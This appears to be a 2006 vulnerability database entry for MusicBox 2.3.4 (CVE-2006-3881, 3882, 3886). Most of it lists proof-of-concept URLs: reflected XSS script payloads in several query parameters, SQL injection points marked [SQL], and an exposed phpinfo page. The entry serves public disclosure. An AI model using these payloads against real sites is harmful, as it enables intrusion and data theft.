MusicBox <= 2.3.4 XSS SQL injection Vulnerability

Vulnerability ID 1053169 Vulnerability type
Published 2006-07-27 Updated 2006-07-27
CVE ID CVE-2006-3882
CVE-2006-3881
CVE-2006-3886
CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2006070121
|Details
Vulnerability details have not yet been disclosed
|Exploit
MusicBox 2.3.4

http://www.musicboxv2.com

------------

PHPinfo page

------------

/phpinfo.php

--------------------------

Cross Site Scripting (XSS)

--------------------------

http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0

http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0

http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0

http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script>

http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists

-------------

SQL injection

-------------

http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]

http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists

http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]

-----------------

Ellipsis Security

http://www.ellsec.org